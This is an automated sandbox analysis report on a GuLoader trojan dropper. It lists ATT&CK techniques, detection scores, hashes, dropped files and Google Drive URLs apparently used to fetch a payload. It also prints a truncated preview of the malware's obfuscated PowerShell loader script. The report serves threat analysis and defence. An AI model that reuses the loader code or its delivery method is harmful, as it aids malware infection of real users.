      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403359
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 411 Process Injection | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 411 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 114 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Source | Detection | Scanner | Label | Link
      Cpfkf79Rzk.exe | 55% | ReversingLabs | Win32.Trojan.Guloader |
      Cpfkf79Rzk.exe | 71% | Virustotal | | Browse

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe | 55% | ReversingLabs | Win32.Trojan.Guloader |

      No Antivirus matches
      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      https://drive.usercoEm | 0% | Avira URL Cloud | safe |
      https://drive.userconte | 0% | Avira URL Cloud | safe |
      https://drive.userco | 0% | Avira URL Cloud | safe |
      https://drive.usercontent.google.com; | 0% | Avira URL Cloud | safe |
      https://www.google.comG | 0% | Avira URL Cloud | safe |
      https://drive.usercontent.go | 0% | Avira URL Cloud | safe |

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
      drive.google.com | 216.58.206.46 | true | false | | high
      drive.usercontent.google.com | 142.250.181.225 | true | false | | high
00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.comGKvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://nsis.sf.net/NSIS_ErrorErrorCpfkf79Rzk.exe, 00000000.00000002.1512453597.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Cpfkf79Rzk.exe, 00000000.00000000.1394783976.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Kvababbelser58.exe, 00000007.00000000.2058334532.000000000040A000.00000008.00000001.01000000.00000007.sdmpfalse
                                                                                      high
                                                                                      https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8OKvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503720643.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive.usercontent.google.com/UKvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 
00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://drive.usercontent.google.com;Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://drive.usercontent.google.com/IKvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://drive.usercontent.google.com/KKvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://drive.google.comKvababbelser58.exe, 00000007.00000003.2573107451.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2629989123.0000000005508000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595812052.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607422737.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584865349.0000000005507000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2561976244.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550492159.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://drive.usercontent.google.com/download?id=1lZSLtwKvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.181.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
216.58.206.46 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1588341
                                                                                                      Start date and time:2025-01-11 00:47:33 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 7m 29s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:10
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:Cpfkf79Rzk.exe
                                                                                                      renamed because original name is a hash value
                                                                                                      Original Sample Name:f973b482345d4ff8ac164868b9f50ce95e47ed2648b57c400ab59f04457c9a4f.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 33.3%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 102
                                                                                                      • Number of non-executed functions: 39
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Kvababbelser58.exe, PID 5912 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1428 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:48:49 | API Interceptor | 39x Sleep call for process: powershell.exe modified
18:50:01 | API Interceptor | 20x Sleep call for process: Kvababbelser58.exe modified
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):53158
                                                                                                      Entropy (8bit):5.062687652912555
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                      MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                      SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                      SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                      SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Category:dropped
                                                                                                      Size (bytes):859890
                                                                                                      Entropy (8bit):7.71013146377017
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:wTJidkhIqHdLUTVbvGjO+BEbofv1gb0FQFDuykrMhiNAgZY8i3oXRKQCzcdYS:wTkQIwLUTVTNsfvSb0KFLsfZV+ER/
                                                                                                      MD5:C642619AD2A1AC39867C56CB2F889E78
                                                                                                      SHA1:A15C485E5DBACDB5776E2CEC6C3A1AF3C4A400D2
                                                                                                      SHA-256:F973B482345D4FF8AC164868B9F50CE95E47ED2648B57C400AB59F04457C9A4F
                                                                                                      SHA-512:6826587E16A8B919438C48FA68297FAF81B5D0868F0599301648F36D2A7421648ED9016EE760D3D9064DE4C293D6ED094FD96C601B190D1BB1AB23D3CE8B8A1D
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 55%
                                                                                                      Reputation:low
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..........................................................................................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................|..............@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):489410
                                                                                                      Entropy (8bit):1.2436305558399738
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:cU0VmvQia2T11QAJnUkKziB0gN0lQus3vm1YAzEYu:QVr4Z1QAJnUkKzK0gGlav67u
                                                                                                      MD5:03ADD5EC69F2D821F4BDDF502603364B
                                                                                                      SHA1:CEB941FCEF1D7D81F2BCC650E311A074B72D4DB0
                                                                                                      SHA-256:A8850B76F116EB91305228F5F39B2B6152927531705DE707A60FC74B86DF4003
                                                                                                      SHA-512:4B5864679A31EA4B0268A758B8179E14A1A682059B393834DE0260315BC0D086F1D98E944E0429304FFF518105226C5A9FD991050D98168059C34BCA1A677B2C
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 42-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 34359738368.000000
                                                                                                      Category:dropped
                                                                                                      Size (bytes):359870
                                                                                                      Entropy (8bit):1.2579154698125035
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:rJW+KJEK8CwPtS6DGm9KLLa+yoa6PQw3HNilLOurKGMTXU9NOXHeFG1jfERxHJ8i:iMCknb2N+S8kEqSe8PW7FZs4baLL
                                                                                                      MD5:8A6A8A75FE9A08909B09C7242C1B0C73
                                                                                                      SHA1:0EC96FBA81824408C7838638BDA73C6C1D055CFA
                                                                                                      SHA-256:1AAD58A3F50A3EF4E50AFCECBAF81D840F4E3F0C512BCC5844A1AEC594A06FF7
                                                                                                      SHA-512:4322DC485F01AD114244945AA63652B191E6BE6C5B4531678310C160AC8963A6FD30E3936747C9282C8EF147806324E99EE954929EB4F1568ADB71E8C89AD596
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):409643
                                                                                                      Entropy (8bit):1.258117650984378
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:oK/xjE18JOxBR9iH6C0q2bSbck323mbP5cA:ooEOAxsxw222bRn
                                                                                                      MD5:0B038FD9C23C723696185E52EBCCB874
                                                                                                      SHA1:26F3EE8ABCC584DC46AB1AF5C6B1C26C3914F1A8
                                                                                                      SHA-256:1E6B1012ABE05CD0B6409C6844E61C6314CF9EE5E04AF6E89352E09166C80B13
                                                                                                      SHA-512:8BE9637A6195820DBD8BF6FDB6B35CD0499F007E36FB2B474D9120559473A98EB09CD622821821B16C7DFCE9D98EDDC61D647A61025C4CC36F451C88569E3100
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (4279), with CRLF, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72669
                                                                                                      Entropy (8bit):5.180695376146685
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:crIzuUsAUTINNzySs5SWFwxUZiIL9BCIxbpqhg/SMe0IAy3nHyA93Xj:JzpsvINIHFghq9BCIJEjRDj
                                                                                                      MD5:209C7B647C3E79CED487D0AD4EB5FA7A
                                                                                                      SHA1:23EC5B5C5E8416701FDBE1579685A88EC88A3AC9
                                                                                                      SHA-256:25DE529A818ED3E2C5609D0C210F2D259385591B27AA5DF9D42E5D1AABB3381B
                                                                                                      SHA-512:1BAE296733140432E001F4A32C91F427583EDA055124ACFFA986230C95F7FD4B4E19426CDC6FEF283509AF8E79FA82ED10A4B172109AB14FA6E9089F0F6C02D0
                                                                                                      Malicious:false
                                                                                                      Preview:$Untenable=$Thiol;........$Rubbaboos = @'.Monalis.Narc.ti$UdriggeDSkdern iSkrukkel EnsilelStartkoy ArteridKaliumkaEqui islUnremailDiskretyWattles= Rup,ah$ Di.locGHeadrensVanguartubeboete SamstelBenjyomrF.kkuwae JonglrrSclerothTransceaConsentaOvermornRestuffdPrecleabScutello,tyrefugGard,ofe PlanlgnAvant asOsphyal;Rebu in. AnmeldfFadsernuSarcostnHwtkursc etorctLysestbi nklago AswashnHumpe r Astro oRTrykknaeInductovRepr.valForhold Tttrykt(Rallyer$AfdelinSEgriotpkEvigungaRep obatComputet NonapheWhi,masfKa ereaoArcha.grFe.tprohPosthasoQuadrill Cep aldTilb gg,Svajmas$CarfareO AfstalpUncritigjordslaaEmneo rvBgegrenePladshotTamkatseseptibrkBanjoristerape t RutebaeCounterr Zygo p)fagf,re W mplel{Kinstet.Stopban. Puert,$Lder,inDUddatafrSca ersosolweigsOrgano,tPrecondeTilisenrBrkmiddnUpquiveeCoat essArbejds Sw.tchs(PriskaiKVerdensoNdodermlIcelandiLysbilln Impr,bsOmfavnek Flageli.ourmaleParthensTremast Shalet'anysi,uH ForskeaStres fm MaintarInterlaiMonap anStiffru,Pedigre$ ToplesVMa tyrmiKogni
                                                                                                      Process:C:\Users\user\Desktop\Cpfkf79Rzk.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):336043
                                                                                                      Entropy (8bit):7.675092239153557
                                                                                                      Encrypted:false
